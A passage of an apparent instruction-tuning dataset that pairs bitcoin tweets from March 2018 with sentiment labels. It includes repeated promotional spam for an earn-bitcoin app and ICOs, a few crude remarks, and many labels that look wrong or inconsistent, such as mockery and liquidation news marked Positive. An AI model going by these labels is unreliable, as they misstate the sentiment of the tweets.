#ethereum #bitcoin\nWelcome to ICO project! My best recommendation for you! Participate now!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Blaming #bitcoin for #ransomware attacks is like #blaming the #dollar when a #bank is #robbed.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Spruke do you commission bitmojis with bitcoin god I'm old", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Crypto Collectibles Are Worthless Without a Websitehttps://news.bitcoin.com/crypto-collectibles-are-worthless-without-a-website/", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Elections bought by Bitcoin Billionaires, no issues?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.643,300\n1 Hour: -0.62 % | 24 Hours: -4.61 % | 7 Days: 5.03 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8641.01 / 7013.475\u20ac\n1 bitcoin-cash = $1001.13 / 812.567\u20ac\n1 ethereum = $532.798 / 432.445\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:09:51 2018 (0:10)\nUSD : 8600.79\nWght: 0.43\nBlk#: 514749\nSize: 4.4 KB\nTXs: 16\nPool: 55 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000005d9276e028d5d5bed13951c19ec762fd4b1b592cc01bb mined at height 514748.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000027de32b3c537e1d112a86ed648ee1662f9f72e00b39761 mined at height 514749.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#skyfchain\n\nSkyfchain is very unique concept. Invest now\n\n#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8608.6", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I invented a currency better than #bitcoin or any #cryptocurrency it's live rhinos.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BitcoinCashBCH @Bitcoin @rogerkver you're just stupid...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JoyceWhiteVance Bitcoin, you think?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin, more like shitcoin, haha like comment subscribe", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83c\udd71itcoin To The Ground: $8515.32 USD\nPrevious Price: $8665.9 USD\nPercentage Decrease: 1.738%\n#BTC #BITCOIN \u26d4\ud83d\ude22", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9563.39 --- Includes Sum of Forks, Core $8514.00 (89.03%) + Cash $990.86 (10.36%) + Gold $58.53 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "please give me\n32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe\n\n#Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If you\u2019re not going to work on making Bitcoin cash again but some ICO bullshit, I\u2019m going to educate regulators to how to put you in jail.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@EricBalchunas @ETFcom they did a good job merging away from bitcoin in their holdings. I don't know how they did it.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8632.39.\nThe current price of BCash is $1001.13, or 0.116423 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Prediction: Satoshi comes out of hiding to talk shit about Bitcoin Cash. $BCH $BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aroundofshe why do they call it bitcoin if you can't eat it", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Getting more Bitcoin when trading only matters if your making enough to outweigh its price swings \ud83e\udd37\ud83c\udffe\u200d\u2642\ufe0f", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoinintmoney @ryanxcharles \"Bitcoin Cash is a scam\" is a scam.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CryptoCompare Bitcoin price changed -2.02% to $8489.49 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@EricBalchunas @ETFcom Nice switch from bitcoin in their holdings. They probably dropped it after futures got started? I'm guessing", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$1.001,130\n1 Hour: -1.08 % | 24 Hours: -5.20 % | 7 Days: 7.94 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TheFuNk_TV @bstategames I mean, there are physical bitcoin irl, but it's just not a practical or common thing.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 Retracement on Bitcoin Daydream Believer Low 8,429.88 (high 8.688.28)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@OnWindowly Can I borrow to buy more Bitcoin cash?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TehJoeCow @derose Must respect Bitcoin because respect wamen.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8587.57 / 6970.101\u20ac\n1 bitcoin-cash = $995.605 / 808.082\u20ac\n1 ethereum = $529.844 / 430.047\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Wow...was on a Zoom with none other than Charlie Shrem, a bitcoin god!\n#whocares", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 Retracement on Bitcoin Whats Love got to do with it 8,403.12", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "SlideCoin is an Android app that allows you to earn bitcoin from your phone...please download app Slide Coin, open with code DUB879", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Getting real tired of Bitcoin's bipolar bitch ass. $BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JohnTitusRenzi2 Not at $2999 before Bitcoin miners drive it up to $9999", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 I dont care who your are where your from retracement on Bitcoin=low 8,341.28", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BDubbJr He got SUPER into bitcoin. He came back and started doing reviews", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Gonna wake up and buy an undisclosed (that means secret but dont worry it's not a lot) amount of bitcoin in the morning.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Looks like #bitcoin is forming an upsidedown Donald Trump!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JanKasparecArt @KeanuReeves_USA Nice work Broski! next up....Buddah n Bitcoin? ;)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:25:18 2018 (15:27)\nUSD : 8421.41\nWght: 0.42\nBlk#: 514750\nSize: 820.7 KB\nTXs: 1670\nPool: 112 (0.0 MB)\n@dellisny\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 Low for Bitcoin done on this song=As Long As You Love Me, Backstreet Boys", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000000d7d77781d4eb0bacfaca1af23caf7e476b26375829499 mined at height 514750.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin Do not worry, the great Sal told us that 9k is the absolute and final bottom. It can never go under 9k!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1c4433fe7d5b80456690cd24b3294236d359899753146d6bb54b880621f1a9e3/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "403bccf9c8dd5e8452ba51a90801130c65b59174d2b950355d6cbe8d6dd0ca25/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC broke down $8600. Lookin for a hard bounce from 8400, or $7300 is in play. #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2008. The world was falling apart. 2018 the world is still falling apart. Care to predict what bitcoin\u2019s role will be?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MacroScope17 Complete mass manipulation. Without it bitcoin would be nowhere.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If dow crashes be ready.... #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two consecutive lower highs and lower lows.\nWe're in a downtrend again.\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just dropped a Bitcoin into the \"Feel Better Otis\" boot. #ChicagoFire", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-BAT AskRate: 0.00002380 #Bittrex #BAT $BAT #Basic Attention Token #altcoin #bitcoin #cryptocurrency\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8514.08 / 6910.453\u20ac\n1 bitcoin-cash = $979.052 / 794.647\u20ac\n1 ethereum = $521.758 / 423.484\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8428.79@bitstamp. High $9099.590. Low $8377.290. Market Cap $142.720 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8514.08\nEthereum:$525.827\nBitcoin Cash:$979.052\nLitecoin:$158.993\nRipple:$0.637571\nIOTA:$1.2709", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8514.08\nEthereum:$525.827\nBitcoin Cash:$979.052\nLitecoin:$158.993\nRipple:$0.637571\nIOTA:$1.2709", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004714 (-0.00000140) #BTC / 0.39587 (-0.02144) #USD. Market rank is 115. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002267 (+0.00000001) #BTC / 0.190338 (-0.00454) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0473071 (+0.00007240) #BTC / 401.192 (-5.08800) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003342 (-0.00000032) #BTC / 0.280647 (-0.00944) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077814 (-0.00000636) #BTC / 6.53418 (-0.21354) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@michaelbatnick What is bitcoin ? Niagra falls ?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypto_lily @MichaelSuppo @boxmining @TheCryptoZombie @CryptoLeung Correction: Not Bitcoin Brothers but instead it's Crypto-Bit Brothers", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8477.23 as of Thu Mar 22 21:31:10 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8450.66", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is testing the support zone \ud83e\uddd0\nIf this support zone is broke then next support is around $8k \ud83e\udd13\n#btc #trading #cryptotrading#crypto", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Marc_Brownstein Did he tell you about bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@shitposterchild @cryptostardust Corn is short for Bitcorn is slang for Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchair @ivivekkm @nikzh @linuxi0n @Sachi_Miura #Bitcoin has future, #Bcash doesn't", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "woah big drop on #btc #bitcoin just now 8300 range #binance\n\n#altcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@khunFYP @btc_manager maybe because you're hysterical when someone calls bitcoin cash a scam", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@movementsjpg I wish I could but I have my money tied up in bitcoin and my future, sis. I\u2019m sorry. I hope you fine another way \ud83e\udd19\ud83c\udffd", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Why does everyone who likes bitcoin look like a gym teacher that takes it too seriously?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin was a good investment while it lasted", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoLeung So when inflation happens people will have no choice to turn to Bitcoin\ud83d\ude0e", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:36:21 2018 (11:03)\nUSD : 8411.70\nWght: 0.42\nBlk#: 514751\nSize: 706.2 KB\nTXs: 1250\nPool: 41 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000026d81defd2989c8d311898a4a4029d62fdcea219e3347e mined at height 514751.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Beanie Babies are the next Bitcoin don\u2019t @ me", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AN ASSHOLE", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The #BitcoinPizza would be worth US$85,140,800.00 right now (down -6.16% in the last 24 hours): #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ArmyStrang This is literally bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Weeeeeeeeeeeeeeeeeee $BTC #BITCOIN", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8450.62 / 6858.945\u20ac\n1 bitcoin-cash = $975.709 / 791.934\u20ac\n1 ethereum = $520.671 / 422.602\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "No deal room services at this time! #Blockchain #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So this is the plan. Spread some fake news when #bitcoin rises so all the fools sell and we collect\n#BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitdominion @BitcoinDojin @ErikVoorhees There\u2019s going to be bitcoin backed credit cards $mco and others, before you know it", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Ilovebitcoin because broken #bitcoin miners are easy to fix", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Dunnestar @ProfFaustus If I buy 1 bitcoin per day and HODL, is that useless?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ProfFaustus @haseebinc @lopp @naval How many more of your dead friend's @bitcoin are you going to sell?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Looks like bitcoin is in retrograde again", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So we're dumping #Bitcoin because @binance (an alt exchange) got a letter from Japanese regulators... Seems legit. BTFD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Please remind me never to predict BTC again \ud83d\ude48she\u2019s sefinately a girl, clearing PMS\u2019ing and pissing me off now .#Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "why dont care about bitcoin can i just broke it ill fix it tomorrow i think", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My bf is playing Tokyo Xanadu now and he just made the excellent point that Yuuki absolutely fucking mined bitcoin out the ass", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The NSA Spied on Bitcoin Users \u2013 Leaked Documents by Snowden Reveal", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Volume Spike triggered for $ethusd Interval 1h #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Please remind me never to predict BTC again \ud83d\ude48she\u2019s definitely a girl, clearly PMS\u2019ing and pissing me off now .Time to grow a pair! #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CobraBitcoin @Excellion @BitMEXResearch Why do you claim 'BCore altcoin is Bitcoin' on your site?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "WHAT ICO'S ARE YOU MOST LOOKING FORWARD TOO\n\nLet me know of some that you are looking at\n\n#Bitcoin #ICO's #ETHEREUM", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Time to start accepting taxes in #bitcoin @Cityofatlanta\u2014you'd be unlocked in no time ;)\n\n#crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lucamarra8 @thecryptofam $4M+ worth of XBT - Bitcoin Quanto Futures Contract - long position was liquidated, i.e. the position was lost.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin This is a great concept for the crypto community", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@patribotics I think you're right about bitcoin. It's overdue for some guidance anyway.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "In my heart, I believe bitcoin is ridiculous and that's dandy", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Headed to the strip club, yo. What part of the G-string do I put the Bitcoin in?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aliasvaughn This may be bitcoin bust which indirectly and directly is involved in Trump/Russia.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$8.2k #BTC #BITCOIN is enough dip for me STOP selling", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I would love to see Bitcoin Private listed on koinex. #whatsnextonkoinex", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Breaking News: Binance will be listing WAN( $WAN) soon #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "There is so much happening in #crypto We are literally changing the world right now #bitcoinminer #bitcoin #btc #bitcoinsfuture", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TheNvsibleHand Bitcoin is your gold and litecoin is your dollar. Plain and simple", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin and all is cool but have you invested in a person that turned out totally worthless.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I guess we're going to revisit the $8115 and $8150 pivots.\n\nGod help us if they don't hold. $BTC #BTC #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@marchmadness I\u2019d like somebody to check the refs PayPal, Bitcoin, wallet or whatever the hell they use after the game.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8399 / \u20ac6812 / \u00a35948 @ Block 514751. \nMarket Cap: 145.52B USD. #Bitcoin #\u30d3\u30c3\u30c8\u30b3\u30a4\u30f3", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Why have so many attempts to get any kind of significant tx volume on BCash failed?\n\nThe Great BCash Failing Debate - A Flatline", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.89 / 6859.976\u20ac\n1 bitcoin-cash = $972.339 / 789.198\u20ac\n1 ethereum = $517.33 / 419.89\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Who wants to fork bitcoin? This site is sold to him", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Who is selling bitcoin right now? Is there some negative headline or potential news on the horizon?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MAPS has 1 new tx\n(\ud83d\udcc9 output: 0.00115192 BTC / 9.67 USD)\nFinal balance: 0.00000000 BTC / 0.00 USD\n#donation #bitcoin #cryptopaymon \ud83e\udd84\ud83d\uddff\ud83d\udc4d", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8421.92", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Trading crypto is a way of transferring money from the impatient to the patient.\n\n#cryptocurrency #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@The_GetawayGirl @fuzzlime Get sun then put on sun lotion buy bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What are the mechanisms/methods you usually use for predicting bitcoin value?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I stopped checking crypto prices, and r/bitcoin a while back... is everything back to normal yet or is shit still hitting the fan", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:54:01 2018 (17:40)\nUSD : 8406.46\nWght: 0.42\nBlk#: 514752\nSize: 1009.1 KB\nTXs: 1961\nPool: 44 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Right now i have no idea the price of Bitcoin. Many many hours ago it was 8560. My pediction is 8800, a moderare rally", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How much price of @Bitcoin will go till July? #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitstein The truth hurts, whatever you call him...he\u2019s talking economics behind bitcoin. He is absolutely right.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000008167a540c3d094befe6c9543e2ece27071ab87641581c mined at height 514752.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "another night staring at a screen instead of sleeping \ud83d\ude0c u feel me? #bitcoin #teamnosleep", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I know this has to be fake but it\u2019s still hilarious. Bitcoin jokes amuse me because of the this is to stupid to be real but yet", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@humanifold @Blockstream @shesek Sorry, not interested in bitcoin. There are other better coins.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin: dead \nkinzcash: alive", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DougKass What about all the bitcoin on the sidelines?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin duh", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Where have you been trading most lately? $crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Well @Google caused a bear market for crypto. gg everyone. We let a cooperation have the ultimate power over all of us. #bitcoin $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@seanhannity Silver and gold, silver and gold #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "[me, hanging out with a bunch of pretentious hipsters]\n\n\u201cSo bitcoin, amiright?\u201d", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@QTRResearch bitcoin is not the same as blockchain. one is a derivative of a system that doesn't need to exist.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin. The obvious king", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aliasvaughn Bitcoin, money laundering, TT, etc. So many to choose from.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin/litecoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitfury-Backed Bitcoin Miner Secures Canadian Land Deal...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:56:46 2018 (2:45)\nUSD : 8416.97\nWght: 0.42\nBlk#: 514753\nSize: 159.6 KB\nTXs: 338\nPool: 55 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", 